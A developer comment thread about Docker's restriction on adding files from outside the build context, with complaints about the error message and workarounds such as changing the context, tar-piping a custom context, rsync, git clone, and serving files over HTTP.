Usage:	docker build [OPTIONS] PATH | URL | -

Build an image from a Dockerfile

People should refer to extended description on the website:

https://docs.docker.com/engine/reference/commandline/build/

The docker build command builds Docker images from a Dockerfile and a “context”. A build’s context is the set of files located in the specified PATH or URL. The build process can refer to any of the files in the context. For example, your build can use a COPY instruction to reference a file in the context.

The URL parameter can refer to three kinds of resources: Git repositories, pre-packaged tarball contexts and plain text files.

Reading that, it’s quite easy to grasp what “Forbidden path” really means. It doesn’t have anything to do with permissions.

@StingyJack

I should not need to digest tomes of information just to “get started”.

Writing Dockerfiles for your project doesn’t sound like “getting started” to me. It requires quite advanced knowledge. The getting-started tutorial describes setting up a very simple project that doesn’t require any prior knowledge. But if you need to set up anything more complex you must know how Docker works. And yes, it requires quite a lot of time to figure out.

Super clean and direct and works fine, at least for me: https://www.jamestharpe.com/include-files-outside-docker-build-context/

I’m not compiling anything

Well, you’re compiling an image. Even though you have already “built” a thing you want to put into an image, you have not built an image.

It doesn’t tell me what the build context is.

Well, error messages should not replace documentation.

5 years later and docker still issues this cryptic error message that rivals ones from nuget.

How about at least putting in “Even though you are in path X when you issued the docker command, and your dockerfile has a path relative to X, and you have specified a working directory in the dockerfile, docker is going to be working in path Y (ps. u r stupid noob)”

At least I think that’s the obstacle preventing me from completing a basic walkthrough. This tech seems great and all, but I shouldn’t need to spend a few weeks researching the ins and outs and dealing with 5 year old bugs like this just to try it.

I’m running into this issue as well in a Go project. Here’s how this became a problem for me:

I want to run a container for developing my server locally, which has the following approximate structure:

MyOrg 
└───Dependency
│   │   dep.go
│
└───Main
    │   main.go
    │   depends-on-dep.go
    │   Dockerfile

Inside of my Dockerfile, there are two options I can think of here:

  1. ADD ../ /go/src/MyOrg
  2. Only add the main package and then install the dependencies from the repo

The first option doesn’t work because of this bug. The second option isn’t only awful, but doesn’t work because of moby#6396 (another multiple-year-old unsolved issue), and MyOrg happens to be bristling with private repos.

My only other option is to put all the dependencies into the vendor folder

MyOrg 
└───Dependency
│   │   dep.go
│
└───Main
    │   main.go
    │   depends-on-dep.go
    │   Dockerfile
    └───vendor
        └───Dependency
            │   dep.go

Now if I ever want to update Dependency/dep.go I have to run a script to manually copy the Dependency folder into the vendor folder. Just bizarre.

Or alternatively, as @Romathonat kindly pointed out, I can cd to $GOPATH/src and run the command $ docker build -f ./MyOrg/Main/Dockerfile -t MyProj ., so now my image is a nice husky ~300mb due to how much is in $GOPATH/src.

Poking the issue once again.

For those still seeking a usable workaround, there was a method stated somewhere above which we adopted some time ago: using a separate repository and git cloning a specific revision in the Dockerfile. It works great and if you don’t mind having a second repository it is a nice workaround.
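
A sketch of that approach; the repository URL and revision below are placeholders, not real values:

FROM debian:stretch
# clone the shared code at a pinned revision (placeholder) instead of copying it from outside the context
RUN apt-get update && apt-get install -y --no-install-recommends git ca-certificates \
 && git clone https://example.com/myorg/shared-code.git /opt/shared \
 && git -C /opt/shared checkout <pinned-revision> \
 && rm -rf /var/lib/apt/lists/*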

The suggestion to put it into the root and use .dockerignore would work if there were a way to specify which file to use as the .dockerignore when running docker build (as it is possible to do for the Dockerfile); judging by https://docs.docker.com/engine/reference/commandline/build/ it is not possible, and docker-compose does not seem to have an option either: https://docs.docker.com/compose/compose-file/.

Imagine the following structure:

project-root
|------------ library (included by all sub-projects)
|------------ sub-project1
|------------ sub-project2
|------------ sub-project3

You would need one Dockerfile and one .dockerignore file per sub-project; that would be ugly, but acceptable, as it could easily be dealt with by using docker-compose. However, as stated above, there seems to be no way to specify the .dockerignore file for a build, which would mean that one would have to rename files before every build (which in turn means no docker-compose).

Structure:

  • Libraries
    — Library 1
    — Library 2
    — Library 3
  • APIs
    — API 1 - references library 1
    — API 2 - references library 2 and library 3

If I request API 1 to be built, I do NOT need to send Library 2, Library 3, and API 2. I ONLY need Library 1 and API 1.

This is a C# project reference: <ProjectReference Include="..\..\..\BuildingBlocks\EventBus\EventBusRabbitMQ\EventBusRabbitMQ.csproj" />

Your Options:

A. Change project references to local DLLs, destroying all IntelliSense for every library

B. Hot-swap project references to build only the DLLs needed for each individual docker build (hundreds of hot swaps, sounds fun)

C. Send 800MB per build, when only 2 of those projects are actually needed

D. Don’t use Docker for anything build-related, even though that is one of the main reasons I want to move to docker (removing the dependency on the developer machine: one might use a Mac with .NET Core 1.1 installed, another might have 2.0 installed on Windows, etc.).

E. Fix Docker and make everyone happy.

I tried symlinks up the wazoo; they did not work. Copying the file to the root of the project isn’t as pretty as symlinks, but it does work.

@ORESoftware The trick I’ve used in the past is to use symlinks and then rsync everything with symlink resolution to a separate folder for building. It doesn’t really work if you have really large files in your build, but for most use cases it’s a workaround that can get the job done.
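
A sketch of that rsync trick, assuming a throwaway staging directory is acceptable (paths and the image name are illustrative):

#!/bin/sh
set -e
staging=$(mktemp -d)
# --copy-links replaces each symlink with the file or directory it points to
rsync -a --copy-links ./ "$staging"/
docker build -t myorg/myimage "$staging"
rm -rf "$staging"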

You can just build the Docker context directly:

# Tar the current directory, then change to another directory and add it to the tar
tar -cf - ./* -C "$SOME_OTHER_DIRECTORY" some_files_from_other_directory | docker build -

This is basically what https://github.com/six8/dockerfactory does

@Vanuan

“So if you want to use files outside the build context you’d have to copy those files to the docker server.”

So, can that not be done automatically? If I specify a file out of the context, is it not possible and/or feasible to automatically copy it to the server in order to build it into the image?

“One things docker newbies don’t realize is that you can keep Dockerfile separate from build context.”

So, the unfortunate haughty attitude to your “newbie” users aside, this is actually what has already been suggested (by @Romathonat above), and as I stated in my own post, this is the solution I am currently using. This works for me. However, if I had multiple, shared config, and my individual docker images were rather big, this would get fairly prohibitive, as it has been stated by others that each docker image would contain the files for every other docker image, even though it would never need them. I could easily see why people would be frustrated by what they could easily see as stonewalling in refusing to work with users’ requests and needs and implement this feature.

“You’re a docker hosting provider (or CI) and allow people to upload their private git repositories with Dockerfiles.”

If I understand this correctly, it seems like this is a case where someone is intentionally setting up a situation just to create this problem. Wouldn’t this mean that people are uploading not just Dockerfiles, but actual private information to this central server? Private information a malicious Dockerfile could then supposedly read and include into its own image via an “ADD” command? Because if I can just ADD someone else’s Dockerfile, it doesn’t seem like a catastrophic issue (although definitely still a security breach), but how would the system be able to “read” that other file in the first place? Is everyone acting under the same user in this CI system (which seems like a major security breach right there)?

It seems like this is a problem the creator of this service should be solving with virtualization, security “jails”, system access security, etc., rather than force the other 99.9% of docker users into a strict system just to prevent this one sysadmin from blowing their own toes off.

Secondly, there are many ways for a sysadmin to get around this problem. First off, system access control (if my user has access and/or permissions to a set of files, I can include them; otherwise, I get a read access error, etc.), virtualization via VMs, etc., or other tactics (such as not allowing people to upload private information which can then be downloaded by other users via malicious Dockerfiles in the first place). This seems more of an operational/systems problem to me, not a job for a particular tool to be enforcing a strict paradigm just to save greenhorn sysadmins from making security miscues.

I suppose it could be a Docker in Docker but there are many options for virtualization depending on your platform.

@thaJeztah Good point. I think what’s confusing to me is that there are two phases of “adding” a file. There’s the file getting included in the build context by virtue of which directory is specified in the docker build command. And then there’s the file getting added from the build context to the image via the ADD command in the Dockerfile.

Intuitively I always have expected ADD to add a file both to the build context and to the image. If that’s not how it works then that’s fine, but it strikes me as potentially very helpful to have a command that does just that. ADD_TO_CONTEXT or something like that.

Not an ideal solution, but if you only need to load a couple of files from a directory on the local filesystem, it’s possible to work around this by serving the local filesystem over HTTP:

# Set DOCKER_IP=$(docker-machine ip)
# docker-compose.yml
version: '2'
services:
  http_fs:
    image: python:2-onbuild
    command: sh -c 'cd /fs; python -m SimpleHTTPServer 8080'
    ports:
      - '8080:8080'
    volumes:
      - ..:/fs
  foo:
    build:
      context: docker/foo
      args:
        HTTP_FS: "http://${DOCKER_IP}:8080"
# docker/foo/Dockerfile
ARG HTTP_FS
RUN wget "${HTTP_FS}/somefile"

This requires turning on http_fs (docker-compose up http_fs) before building foo (docker-compose build foo). AFAIK there isn’t a way to declare a build dependency via depends_on in docker-compose.yml

That might do the trick. It’s a little annoying to have to build two images instead of one, and error-prone if someone forgets, but it may be a quicker and easier solution to the problem right now.

Hi, I found a better solution using compose-file.yml version 2 - you can pass the context of the build. So you can place the files wherever you want and just pass the correct context.
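
A minimal sketch of that compose-file approach (service and path names are illustrative): the build context points at the parent directory, while the Dockerfile stays where it is.

version: '2'
services:
  my_service:
    build:
      context: ..
      dockerfile: docker/my_service/Dockerfile

As in the earlier compose examples in this thread, the dockerfile path is resolved relative to that context.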